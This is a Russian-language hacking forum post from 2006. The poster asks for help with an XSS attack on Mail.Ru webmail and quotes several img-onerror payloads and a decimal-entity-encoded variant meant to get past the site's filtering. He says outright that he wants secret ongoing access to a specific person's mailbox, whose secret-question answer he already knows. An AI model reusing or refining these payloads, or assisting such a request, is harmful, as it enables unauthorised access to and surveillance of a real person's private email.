Показать сообщение отдельно

Отправил нижеследующее по аське Dronge, но пока ответа не дождался :(
  #45  
Старый 29.08.2006, 03:37
steppenwolfe
Новичок
Регистрация: 27.08.2006
Сообщений: 1
Провел на форуме:
1189

Репутация: 0
По умолчанию Отправил нижеследующее по аське Dronge, но пока ответа не дождался :(

Хочу спросить по поводу XSS в Mail.Ru.

Если я правильно понял, то вот такой вариант уже не катит:
PHP код:
<img src="http://img.mail.ru/mail/ru/images/dumb.gif>"onerror=alert('1')> 
<
img src="http://img.mail.ru/mail/ru/images/dumb.gif>"onerror=alert(2)>
<
img src="http://img.mail.ru/mail/ru/images/dumb.gif >"onerror=alert('3')>
<
img src="http://img.mail.ru/mail/ru/images/dumb.gif    >"onerror=alert('4')> 
Я честно попробовал перебить это в десятичную кодировку, получилось что-то типа этого:
PHP код:
&#60&#105&#109&#103&#032&#115&#114&#099&#061&#034&#104&#116&#116&#112
&#058&#047&#047&#105&#109&#103&#046&#109&#097&#105&#108&#046&#114&#117
&#047&#109&#097&#105&#108&#047&#114&#117&#047&#105&#109&#097&#103&#101
&#115&#047&#100&#117&#109&#098&#046&#103&#105&#102&#062&#034&#111&#110
&#101&#114&#114&#111&#114&#061&#97&#108&#101&#114&#116&#40&#39TEXT&#39
&#41&#62 
Поперебирал разные комбинации, но - облом. Был бы у меня декодер - я бы и в шестнадцатиричной попробовал.

Вот я и хочу узнать, это у меня глюки (я, правда, сначала тестил под SP-2, и только потом под незапатченным IE6) или эту дыру заделали?

Может, хотя бы намекнёшь, в какую сторону чесать репу? Я, блин, даже ответ на секретный вопрос знаю, но юзать его нельзя - чел мониторит ящик каждый день, ну и я тоже хотел бы рядом пристроиться))
 
Ответить с цитированием